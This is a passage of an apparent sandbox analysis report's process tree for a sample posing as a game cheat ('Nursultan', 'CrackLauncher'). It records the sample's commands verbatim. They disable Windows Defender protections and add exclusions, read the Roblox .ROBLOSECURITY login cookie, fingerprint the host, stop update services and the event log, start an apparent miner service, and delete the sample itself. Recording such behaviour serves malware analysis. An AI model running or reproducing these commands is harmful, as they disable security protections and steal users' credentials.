        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        32⤵
        Views/modifies file attributes
        
        PID:2144
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:3420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        32⤵
        
        PID:2764
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:3924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        32⤵
        
        PID:3400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:4804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        32⤵
        
        PID:1640
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:2876
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        32⤵
        
        PID:1012
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        32⤵
        
        PID:4272
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        32⤵
        
        PID:4784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        32⤵
        
        PID:4132
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        33⤵
        
        PID:3204
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        32⤵
        Detects videocard installed
        
        PID:3188
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        32⤵
        
        PID:4936
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        33⤵
        Runs ping.exe
        
        PID:4064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        31⤵
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        31⤵
        
        PID:4208
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        32⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        31⤵
        
        PID:3976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4208
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        32⤵
        
        PID:880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        32⤵
        
        PID:3256
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        32⤵
        
        PID:4016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        32⤵
        
        PID:3188
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        33⤵
        
        PID:2464
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        32⤵
        
        PID:4176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        33⤵
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        33⤵
        
        PID:3436
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        34⤵
        
        PID:2056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        34⤵
        
        PID:2312
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        35⤵
        
        PID:2924
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        34⤵
        Launches sc.exe
        
        PID:2384
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:1868
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        34⤵
        
        PID:828
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        34⤵
        
        PID:3132
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        34⤵
        Launches sc.exe
        
        PID:5064
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        34⤵
        Launches sc.exe
        
        PID:1012
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        34⤵
        Power Settings
        
        PID:740
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        34⤵
        Power Settings
        
        PID:220
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        34⤵
        Power Settings
        
        PID:332
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        34⤵
        Power Settings
        
        PID:3872
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        34⤵
        Launches sc.exe
        
        PID:2056
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        34⤵
        Launches sc.exe
        
        PID:2852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        33⤵
        
        PID:3140
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        33⤵
        
        PID:4480
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        34⤵
        Views/modifies file attributes
        
        PID:3648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        34⤵
        
        PID:2464
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        34⤵
        
        PID:2996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        34⤵
        
        PID:828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        34⤵
        
        PID:2032
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        34⤵
        
        PID:3976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        34⤵
        
        PID:3244
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:3256
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        34⤵
        
        PID:3620
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        35⤵
        
        PID:4064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        34⤵
        
        PID:220
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        34⤵
        Detects videocard installed
        
        PID:1316
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        34⤵
        
        PID:4284
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        35⤵
        Runs ping.exe
        
        PID:5008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4596
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        33⤵
        
        PID:2212
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        34⤵
        
        PID:740
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        33⤵
        
        PID:4436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        34⤵
        
        PID:2096
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        34⤵
        
        PID:5048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        34⤵
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        34⤵
        
        PID:5008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        34⤵
        
        PID:228
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        34⤵
        
        PID:3320
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        35⤵
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        34⤵
        
        PID:3640
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        35⤵
        
        PID:4604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        35⤵
        
        PID:4852
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        
        PID:4132
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        35⤵
        
        PID:4808
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        36⤵
        Views/modifies file attributes
        
        PID:988
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        36⤵
        
        PID:808
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:5088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        36⤵
        
        PID:4208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        
        PID:2384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        36⤵
        
        PID:4700
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        36⤵
        
        PID:3320
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        36⤵
        
        PID:4036
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        36⤵
        
        PID:4964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        36⤵
        
        PID:740
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        36⤵
        Detects videocard installed
        
        PID:2796
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        36⤵
        
        PID:3420
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        37⤵
        Runs ping.exe
        
        PID:2876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3968
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        36⤵
        
        PID:3900
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        35⤵
        
        PID:4036
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        36⤵
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        35⤵
        
        PID:828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        36⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        36⤵
        
        PID:3620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        36⤵
        
        PID:2212
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        37⤵
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        36⤵
        
        PID:4128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        36⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3400
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        36⤵
        
        PID:2432
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        37⤵
        
        PID:3244
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        36⤵
        
        PID:2212
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        37⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        37⤵
        
        PID:1776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        37⤵
        
        PID:3920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        37⤵
        
        PID:3148
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        37⤵
        
        PID:3084
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        38⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        37⤵
        
        PID:4832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        38⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        38⤵
        
        PID:880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        38⤵
        
        PID:2796
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        38⤵
        
        PID:1324
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        39⤵
        Views/modifies file attributes
        
        PID:1740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        39⤵
        
        PID:4528
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        39⤵
        
        PID:4372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        
        PID:5048
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        39⤵
        
        PID:4616
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        39⤵
        
        PID:4912
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        39⤵
        
        PID:2212
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        39⤵
        
        PID:2256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        39⤵
        
        PID:2728
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        39⤵
        Detects videocard installed
        
        PID:2880
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        39⤵
        
        PID:4888
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        40⤵
        Runs ping.exe
        
        PID:3936
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        38⤵
        
        PID:3228
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        38⤵
        
        PID:2432
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        39⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        38⤵
        
        PID:220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        39⤵
        
        PID:1152
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        39⤵
        
        PID:3132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        39⤵
        
        PID:1776
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        39⤵
        
        PID:2468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        39⤵
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        39⤵
        
        PID:1776
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        40⤵
        
        PID:4132
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        39⤵
        
        PID:3484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        40⤵
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        40⤵
        
        PID:2856
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        40⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1036
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        40⤵
        
        PID:3084
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        41⤵
        Views/modifies file attributes
        
